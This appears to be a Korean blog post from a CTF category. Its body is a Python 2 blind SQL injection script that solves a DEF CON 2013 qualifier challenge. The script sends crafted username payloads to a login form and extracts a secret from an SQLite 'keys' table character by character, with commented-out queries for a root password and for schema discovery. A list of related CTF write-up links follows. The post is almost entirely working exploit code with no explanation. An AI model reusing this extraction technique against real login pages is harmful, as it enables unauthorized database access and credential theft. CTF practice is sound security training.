sqlite injection 문제.
import httplib,urllib; # Blind SQL injection ck = "" referer = "" # barking up the wrong tree -- # setting #toget = "(SELECT password from users where name='root')" #toget = "(SELECT name FROM sqlite_master WHERE type='table' LIMIT 1 OFFSET 0)" #toget = "(SELECT count() from keys)" #toget = "(SELECT sql FROM sqlite_master WHERE type='table' LIMIT 1 OFFSET 0)" toget = "(SELECT value FROM keys LIMIT 1 OFFSET 0)" stage = 2 print "[*] Stage1: Find Length of " + toget answer = "" length=0 j = 1 k = 1 i = 0x7E conn = httplib.HTTPConnection("babysfirst.shallweplayaga.me",8041) conn.connect() while j <= stage: if j is 1: query = "' or length("+toget+")="+str(k)+" -- " else: query = "' or substr("+toget+","+str(k)+",1) = '"+chr(i)+"' -- " val = urllib.urlencode({'username': query,'password':'1'}) headers = { 'Accept':'text/html, application/xhtml+xml, */*', 'Content-type': 'application/x-www-form-urlencoded', 'Content-length': str(len(val)), 'Cookie': ck, 'Referer': referer, 'Accept-Language':'ko-KR','User-Agent':'User-Agent: Mozilla/5.0 (compatible; MSIE 10.6; hello; Trident/6.0)'} params = urllib.urlencode({'id':query,'password':'abc'}) conn.request('POST','/login',val,headers) response = conn.getresponse() data = response.read() if j is 1: print "now: "+str(k) if data.find('root') is not -1: length = k print "[+] Length: " + str(length) print data print "[*] Stage 2" k = 1 j = 2 # go to stage 2 continue if k is 100: print "[-] NotFound" break k = k+1 else: print "now: "+chr(i) if data.find('root') is not -1: answer = answer+chr(i) print "Find: " + answer k = k+1 i=0x7E if k > length: break else: continue i = i-1 conn.close() print data print "Answer:" +answer
'Computer Security > CTF' 카테고리의 다른 글
| [defcon 2013] gnireenigne, musicman, exploit (0) | 2013.06.17 |
|---|---|
| [defcon 2013] \xff\xe4\xcc, linked, exploit (0) | 2013.06.17 |
| [HDCon 2013] 5번 문제 write up (6) | 2013.06.08 |
| [HDCon 2013] 4번 문제 write up (0) | 2013.06.08 |
| [HDCon 2013] 3번 문제 write up (0) | 2013.06.08 |